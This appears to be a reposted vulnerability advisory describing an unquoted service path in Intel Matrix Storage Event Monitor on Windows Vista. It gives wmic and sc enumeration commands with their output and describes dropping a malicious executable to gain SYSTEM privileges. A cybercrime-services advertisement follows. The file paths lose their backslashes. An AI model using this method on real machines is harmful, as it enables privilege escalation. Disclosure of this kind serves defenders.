# Exploit Title: Intel(R) Matrix Storage Event Monitor x86 - 'IAANTMON' Unquoted Service Path
# Date: 2021-01-04
# Exploit Author: Geovanni Ruiz
# Vendor Homepage: https://www.intel.com
# Software Version:
# File Version:
# Tested on: Microsoft® Windows Vista Business 6.0.6001 Service Pack 1 x64es

# 1. To find the unquoted service path vulnerability

C:>wmic service where 'name like "%IAANTMON%"' get name, displayname,
pathname, startmode, startname

DisplayName                             Name    PathName
                                              StartMode  StartName
Intel(R) Matrix Storage Event Monitor  IAANTMON C:Program Files
(x86)IntelIntel Matrix Storage ManagerIAANTMon.exe   Auto

# 2. To check service info:

C:>sc qc "IAANTMON"
[SC] QueryServiceConfig CORRECTO

        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:Program Files (x86)IntelIntel Matrix
Storage ManagerIAANTMon.exe
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Intel(R) Matrix Storage Event Monitor
        DEPENDENCIAS       :

# 3. Exploit:

To exploit this vulnerability an attacker requires to drop a malicious
executable into the service path undetected by the OS in order
to gain SYSTEM privileges.

Source link

Is your business effected by Cyber Crime?

If a cyber crime or cyber attack happens to you, you need to respond quickly. Cyber crime in its several formats such as online identity theft, financial fraud, stalking, bullying, hacking, e-mail fraud, email spoofing, invoice fraud, email scams, banking scam, CEO fraud. Cyber fraud can lead to major disruption and financial disasters. Contact Digitpol’s hotlines or respond to us online.

Digitpol’s Cyber Crime Investigation Unit provides investigative support to victims of cyber crimes. Digitpol is available 24/7. https://digitpol.com/cybercrime-investigation/

Europe +31558448040
UK +44 20 8089 9944
ASIA +85239733884